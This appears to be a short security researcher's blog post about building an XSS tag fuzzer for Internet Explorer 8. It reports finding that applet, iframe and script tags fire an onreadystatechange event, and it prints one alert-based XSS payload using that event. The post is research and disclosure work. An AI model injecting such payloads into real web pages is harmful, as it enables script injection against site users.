XSS tag fuzzer

It's been a while since I've blogged but I'm pretty busy at the moment with my new baby and also moving jobs as I was made redundant. I thought I'd combine my work with my blogging as I'm working on some XSS vectors for IE8.

During the process I built a simple tag fuzzer which throws all events and attributes at it with as many tags I could find (big thanks to rsnake for the events). At the moment this is just a basic fuzzer which attempt the standard events/attributes but I plan to add encodings and random characters to make it better.

One interesting discovery so far was that the applet, iframe and script have a new event in IE8 (at least I think it's new) onreadystatechange which allows you to execute inline JS e.g.:-

<pre lang="javascript"> &lt;applet onreadystatechange=alert(1)&gt; </pre>

Only tested in IE8 but could work in other browsers. XSS tag fuzzer